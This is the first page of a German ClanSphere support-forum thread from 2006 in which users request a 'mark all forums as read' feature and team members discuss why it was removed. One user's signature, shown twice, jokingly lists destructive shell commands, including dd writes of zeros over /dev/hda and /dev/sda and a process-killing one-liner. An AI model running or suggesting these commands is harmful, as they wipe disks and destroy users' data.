Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 53
Seite [1] 2 3 >
R3NT5CH3R


Beginner




Beiträge: 16
# Thema - 30.09.2006 um 21:24 Uhr
Ich fände es gut wenn es hier auch eine funktion wie bei phpbb2 geben würde. Nämlich die "Alle Foren als gelesen markieren" - Funktion. Vielleicht kann man da was machen.


Zuletzt editiert von R3NT5CH3R am 30.09.2006 um 21:25 Uhr (1x Editiert)
Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 30.09.2006 um 21:28 Uhr
Diese Funktiongab es schon einmal in einer früheren Version.
Sie wurde aber wieder entfernt.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Mr-Bob


Beginner



Herkunft: Braubach-Nord
Beiträge: 4
# Antwort: 2 - 01.10.2006 um 00:18 Uhr
Diese Funktion hab ich mir auch schon oft gewünscht. -.-


Inaktiv
|
R3NT5CH3R
Thread-Ersteller


Beginner




Beiträge: 16
# Antwort: 3 - 01.10.2006 um 00:52 Uhr
Wieso wurde sie denn wieder entfernt?


Inaktiv
|
Baumi


Try to beat me





Beiträge: 159
# Antwort: 4 - 01.10.2006 um 00:57 Uhr
Wieso wurde sie denn wieder entfernt?


Das wäre auch meine nächste Frage gewesen ...

Aber aus welchem Grund brauchste diese Funktion denn?
Ich gehe ja auch nicht in meinem email-client hin und makiere alle emails mit der option "gelesen" obwohl ich mir den Inhalt nichteinmal zu herzen genommen habe.
Aktuell bleibt mir der Sinn eines solchen Buttons noch einwenig verschlossen ...


------------------

Alles was das Herz begehrt: http://www.sentic.org

Counterstrike PublicServer: 80.190.77.75:27015

Inaktiv
|
R3NT5CH3R
Thread-Ersteller


Beginner




Beiträge: 16
# Antwort: 5 - 01.10.2006 um 01:07 Uhr
Sowas ist praktisch, weil wer will schon 1000 neue Threads jeden morgen durchblättern?


Inaktiv
|
Baumi


Try to beat me





Beiträge: 159
# Antwort: 6 - 01.10.2006 um 01:11 Uhr
Die Threads die dich nicht interessieren musste ja auch nicht öffnen, ich mach das in der Regel immer so, dass ich die Liste soweit nach neuen interessanten Threads durchblättere bis ich auf einen bereits gelesenen Thread stoße, ein Fakt welcher mir die Gewissheit gibt, dass ich alle Threads die nach diesem Zeitpunkt erstellt worden sind noch nicht beachtet habe!


------------------

Alles was das Herz begehrt: http://www.sentic.org

Counterstrike PublicServer: 80.190.77.75:27015

Inaktiv
|
Micha.09 ClanSphere Team


Specialist



Herkunft: Dortmund
Beiträge: 2860
# Antwort: 7 - 01.10.2006 um 11:21 Uhr
Zur Zeit mangelt an an der technischen Umsetzung für diese Funktion.


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 8 - 01.10.2006 um 12:55 Uhr
Mhmmm. Ich würde diese Funktion auch ned unbedingt benötigen.
R3NT5CH3R hat zwar Recht was das Lesen betrifft, aber auch das Gegenargument ist nicht verkehrt.

Daher sollte man es vielleicht als optionales Modul einbauen wenn das geht.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
delirium


Rock the board




Herkunft: Leverkusen
Beiträge: 65
# Antwort: 9 - 01.10.2006 um 14:57 Uhr
Dafür!


Inaktiv
|
kaleido


Rock the board





Beiträge: 88
# Antwort: 10 - 01.10.2006 um 15:10 Uhr
auf jeden fall dafür!
ich vote für meinen clan mit (30 member =))


------------------
Signatur +-


Inaktiv
|
Neurologe


King for a day




Herkunft: Rieneck
Beiträge: 351
# Antwort: 11 - 01.10.2006 um 23:47 Uhr
bin ganz klar dafür ^^


------------------
Meine aktuell veröffentlichten Clansphere Module & Addons:
>>>>>>> Klick mich <<<<<<<

---> Ich habe fertig <---


Fun +-

(__/)
(O.o )
(> < )

This is Bunny. Copy Bunny into your signature to help him on his way to world domination.

Einstein sagte zu der Dummheit der Menschen:"Zwei Dinge sind unendlich. Zum einen das Universum, zum anderen die menschliche Dummheit. Doch bei dem Universum bin ich mir noch nicht sicher."

Deutsche FSK:
FSK 12 : Der Gute bekomm das Mädchen.
FSK 16 : Der Böse bekommt das Mädchen.
FSK 18 : Alle bekommen das Mädchen.



Meine Projekte?
Gaming:
http://team-saim.eu
Musik:
http://überschall.net
http://yoursound.info

ps: wer rechtschreibfehler findet darf sie behalten

Inaktiv
|
Timpe


King for a day





Beiträge: 302
# Antwort: 12 - 02.10.2006 um 00:47 Uhr
agree ich auch. ob es von den usern genutzt wird bleibt jedem selber überlassen. ist halt nen nettes standart feauture was mittlerweile jedes popelboard hat


Inaktiv
|
Micha.09 ClanSphere Team


Specialist



Herkunft: Dortmund
Beiträge: 2860
# Antwort: 13 - 02.10.2006 um 01:28 Uhr
mmh dann muss ich mich da nochmal am di umnsetzung hocken


Inaktiv
|
Timpe


King for a day





Beiträge: 302
# Antwort: 14 - 02.10.2006 um 01:30 Uhr
unser dank wird dir zeitlebens hinterherschleichen


Inaktiv
|
blacksight


Rock the board




Herkunft: Karlsruhe
Beiträge: 47
# Antwort: 15 - 11.10.2006 um 13:04 Uhr
So eine Funktion wäre meines Erachtens auch klasse!

Wenn man hier mal ein paar Tage nicht online ist, kommt man mit dem lesen gar nicht nach. Und es gibt auch massig Threads, die man einfach als "gelesen" markieren will, weil Sie einen nicht unbedingt interessieren. So gehen dann auch keine wirklich neuen Beiträge unter, die einen interessieren. :-)



Inaktiv
|
hajo ClanSphere Team


VIP - Poster




Herkunft: Barsbüttel
Beiträge: 9411
# Antwort: 16 - 11.10.2006 um 14:20 Uhr
werde vorerst das jetzige gelesen system leicht optimieren, die gewünshte funktion "gelesen markieren" wurde nicht grundlos entfernt.

sofern die optimierung auf keine große zustimmung stößt werde ich das gelesen markieren wieder in betracht ziehen. kann zu emails nur sagen das aktuelle email programme wie the bat oder thunderbird durchaus alle emails im status ändern können mit nem single klick.


------------------
ClanSphere - professional clan care starts here

Inaktiv
|
Timpe


King for a day





Beiträge: 302
# Antwort: 17 - 11.10.2006 um 15:38 Uhr
werde vorerst das jetzige gelesen system leicht optimieren, die gewünshte funktion "gelesen markieren" wurde nicht grundlos entfernt.



und der wäre hajo ?


Inaktiv
|
ven0m


Going for pro




Herkunft: Essen
Beiträge: 406
# Antwort: 18 - 12.10.2006 um 10:43 Uhr
wäre auch dafür ;D

ich glaub mehr muss ich dazu ja nicht sagen oder ? ^^

MfG
ven0m


------------------
Gruß
ven0m

Inaktiv
|
hajo ClanSphere Team


VIP - Poster




Herkunft: Barsbüttel
Beiträge: 9411
# Antwort: 19 - 12.10.2006 um 11:06 Uhr
warum themen gelesen markieren die man nicht gelesen hat? da entstehen falsche ausgaben. meine methode ist eher es wird ungelesenes das nicht älter als eine woche ist als neu angezeigt und fertig.


------------------
ClanSphere - professional clan care starts here

Inaktiv
|
Chitaroni


Beginner




Beiträge: 15
# Antwort: 20 - 12.10.2006 um 11:48 Uhr
warum themen gelesen markieren die man nicht gelesen hat? da entstehen falsche ausgaben. meine methode ist eher es wird ungelesenes das nicht älter als eine woche ist als neu angezeigt und fertig.


Z.B. habe ein Update gemacht auf die neueste Version und nun sind alle Threads und Kategorien als ungelesen markiert. Obwohl alle schon gelesen worden sind vor dem Update. Nun kommt man komplett durcheinander ob man dies schon gelesen hat oder nicht. Man merkt sich ja nicht 100 Threads ob man die am Tag gelesen hat.

Von daher wäre die Option perfekt. Das man alles als gelesen markieren kann.


Inaktiv
|
Antworten: 53
Seite [1] 2 3 >


Sie müssen sich registrieren, um zu antworten.